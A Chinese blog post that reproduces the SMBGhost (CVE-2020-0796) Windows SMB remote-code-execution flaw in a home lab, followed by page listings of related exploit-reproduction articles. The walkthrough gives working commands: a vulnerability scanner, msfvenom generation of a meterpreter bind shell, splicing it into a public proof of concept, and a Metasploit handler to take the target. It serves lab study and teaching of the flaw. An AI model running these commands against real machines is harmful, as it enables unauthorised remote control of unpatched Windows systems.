【内网渗透】CVE-2020-0796 永恒之黑 复现

原创 于 2025-08-18 21:22:45 发布 · 429 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#永恒之黑 #CVE-2020-0796 #内网渗透

懂的人已经哭了

环境搭建

随便整个对应版本的win10镜像,防火墙全关

Windows 10 1903版本原版镜像 - 我的MSDN

kali 192.168.233.130

win10 192.168.233.156

漏洞复现

检测是否存在漏洞

https://github.com/ly4k/SMBGhost

python scanner.py 192.168.233.156

接下来开打

先用msf生成个正向连接shellcode

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python > exploit.txt

将buf全部替换为USER_PAYLOAD

将下面工具中exploit.py中的USER_PAYLOAD部分替换成exploit.txt文件中的内容

https://github.com/chompie1337/SMBGhost_RCE_PoC

msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 4444
set rhost 192.168.233.156
run
python exploit.py -ip 192.168.233.156

Z3r4y
关注
Windows - SMB 远程代码执行漏洞(永恒之蓝) - CVE-2017-0146 & MS17-010
Blue17 の 小窝
03-22 1397
永恒之蓝漏洞(MS 17-010、
网络安全工具系列:网络安全-MS17-010漏洞-永恒之蓝复现以及渗透流程
weixin_54626591的博客
08-05 398
网络安全-MS17-010漏洞-永恒之蓝复现以及渗透流程
CVE-2020-0796永恒漏洞浅谈与利用
热门推荐
qq_39120795的博客
11-18 1万+
微软发布安全公告披露了一个最新的SMB远程代码执行漏洞(CVE-2020-0796),攻击者利用该漏洞无须权限即可实现远程代码执行,一旦被成功利用,其危害不亚于永恒之蓝,全球 10 万台服务器或成首轮攻击目标。
【SMBghost CVE-2020-0796漏洞复现
qq_55213436的博客
09-19 850
python脚本链接:https://pan.baidu.com/s/1JRcqiTt9EJrF1vFJzVkY_w 提取码:fx6f。工具地址:链接:https://pan.baidu.com/s/1JRcqiTt9EJrF1vFJzVkY_w 提取码:fx6f。工具地址链接:https://pan.baidu.com/s/1_Bffj-G1kA8pSUGH_rCwbQ 提取码:dtso。version1903,镜像下载地址:https://msdn.itellyou.cn/3、反弹shell利用。
CVE-2018-8174漏洞复现内网渗透攻击
Waldocsdn的博客
03-12 3269
文章目录说明CVE-2018-8174漏洞简介Persistence后门环境搭建拓扑图Win server 2008 对Windows 7开启1433端口内网攻击过程1号机获得2号机的权限利用CVE-2018-8174漏洞获取2号机(Windows 7)权限,添加攻击者用户添加超级隐藏管理员账户使用vbs脚本上传SQLTOOLS.exe从Windows 7进攻Windows server 2008...
Web漏洞挖掘班作业 | CVE-2020-2551攻击实录
Ms08067安全实验室
11-15 1901
文章来源|MS08067 Web安全漏洞挖掘实战班课后作业本文作者:某学员A(Web漏洞挖掘实战班1期学员)写再最前听了涛哥关于weblogic的课程讲解,收益颇多(前段时间实在太忙了~ ...
内网渗透vulntarget-a 多层域控靶场
weixin_68408599的博客
12-22 2902
网络拓扑图如下这里我们本次渗透测试,外网Win7IP地址为192.168.127.91靶机信息:靶机用户名密码Windows 7win7adminAdmin@123Admin#123Admin@666靶机下载地址:https://github.com/crow821/vulntarget这个靶场是我第一个搭建在本地上的靶场,虽然中路有很多挫折,比如在前期配置外网网卡时候,发现DHCP一直分配不上ip地址,一直是168.254.X.X,好在后面及时发现问题,发现网卡设置错了。
CVE-2017-7494的复现(Linux永恒之蓝)
siaowei44的博客
07-02 9793
概述 该漏洞CVE-2017-7494又被称为Linux版的永恒之蓝 主要是利用smb上的反弹shell漏洞,进行远程代码执行 环境 靶机ip:192.168.74.161 ,os:centos7,应用:Samba 3.5.0到4.6.4/4.5.10/4.4.14的中间版本。 攻击主机ip:192.168.74.168,os:kali2019,工具:msf ...
远古漏洞-永恒之蓝(CVE-2017-0146)的复现及其个人思考。
2301_82167660的博客
09-18 1317
哪一年才算是真正的“网络安全元年”?2017年。2017年4月14日晚,客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
【漏洞复现】RDP远程桌面漏洞复现(CVE-2019-0708)
weixin_45588247的博客
08-07 1万+
一、CVE-2019-0708: 1. 漏洞背景:   9.7号凌晨一点多,开发者@rapid7在Github上放出了windows 远程桌面服务 RCE漏洞(CVE-2019-0708)的exp。一大早醒来,朋友圈就被各大公司安全预警给刷了屏,趁着上午,立马把该exp复现了一波。 2. 漏洞影响Windows版本: Windows XP SP3 x86Windows XP Professional x64 Edition SP2Windows XP Embedded SP3 x86 Window
ms17-010 漏洞复现-主要用来学习交流
qq_30302577的博客
12-12 4986
ms17-010 漏洞复现-主要用来学习交流(32位系统) 目录: 文章目录ms17-010 漏洞复现-主要用来学习交流(32位系统)一.漏洞原理1.简介2.漏洞原理代码详解二.漏洞复现1.目标信息收集2. 尝试攻击2.1. 查看漏洞模块 search ms17-0102.2. 可以先使用辅助模块来扫描测试 auxiliary/scanner/smb/smb_ms17_0102.3 使用攻击模...
通过Metasploit实现MS17-010(永恒之蓝漏洞)的复现学习
Time_worm的博客
07-14 1412
永恒之蓝是指2017年4月14日晚,客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
slf4j-simple-1.8.0-beta2.jar中文文档.zip
08-24
1、压缩文件中包含: 中文文档、jar包下载地址、Maven依赖、Gradle依赖、源代码下载地址。 2、使用方法: 解压最外层zip,再解压其中的zip包,双击 【index.html】 文件,即可用浏览器打开、进行查看。 3、特殊说明: (1)本文档为人性化翻译,精心制作,请放心使用; (2)只翻译了该翻译的内容,如:注释、说明、描述、用法讲解 等; (3)不该翻译的内容保持原样,如:类名、方法名、包名、类型、关键字、代码 等。 4、温馨提示: (1)为了防止解压后路径太长导致浏览器无法打开,推荐在解压时选择“解压到当前文件夹”(放心,自带文件夹,文件不会散落一地); (2)有时,一套Java组件会有多个jar,所以在下载前,请仔细阅读本篇描述,以确保这就是你需要的文件。 5、本文件关键字: jar中文文档.zip,java,jar包,Maven,第三方jar包,组件,开源组件,第三方组件,Gradle,中文API文档,手册,开发手册,使用手册,参考手册。
基于gin搭建的go框架.zip
08-24
基于gin搭建的go框架.zip
lombok-1.12.2.jar中文文档.zip
08-24
1、压缩文件中包含: 中文文档、jar包下载地址、Maven依赖、Gradle依赖、源代码下载地址。 2、使用方法: 解压最外层zip,再解压其中的zip包,双击 【index.html】 文件,即可用浏览器打开、进行查看。 3、特殊说明: (1)本文档为人性化翻译,精心制作,请放心使用; (2)只翻译了该翻译的内容,如:注释、说明、描述、用法讲解 等; (3)不该翻译的内容保持原样,如:类名、方法名、包名、类型、关键字、代码 等。 4、温馨提示: (1)为了防止解压后路径太长导致浏览器无法打开,推荐在解压时选择“解压到当前文件夹”(放心,自带文件夹,文件不会散落一地); (2)有时,一套Java组件会有多个jar,所以在下载前,请仔细阅读本篇描述,以确保这就是你需要的文件。 5、本文件关键字: jar中文文档.zip,java,jar包,Maven,第三方jar包,组件,开源组件,第三方组件,Gradle,中文API文档,手册,开发手册,使用手册,参考手册。
qhexedit2-doc-0.8.9-11.el8.tar.gz
08-24
# 适用操作系统:Centos8 #Step1、解压 tar -zxvf xxx.el8.tar.gz #Step2、进入解压后的目录,执行安装 sudo rpm -ivh *.rpm
基于go-zero的容器环境.zip
08-24
基于go-zero的容器环境.zip
基于go-gin的商城.zip
08-24
基于go-gin的商城.zip
一款基于GO语言,支持跨平台,可以统计项目代码行数的软件(命令行软件,无界面),支持多种自定义过滤。 主要用于代码安全审计服务相关的费用评估。.zip
最新发布
08-24
一款基于GO语言,支持跨平台,可以统计项目代码行数的软件(命令行软件,无界面),支持多种自定义过滤。 主要用于代码安全审计服务相关的费用评估。.zip
SMBGhost漏洞(CVE-2020-0796)远程代码执行分析
综上,标题“CVE-2020-0796_SMBGhost_RCE_exp.zip”暗示该压缩包内含一个针对2020年发现的,编号为CVE-2020-0796的安全漏洞的漏洞利用代码(Exploit),它允许远程执行代码并且可能利用了SMBGhost漏洞。 ### 描述...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值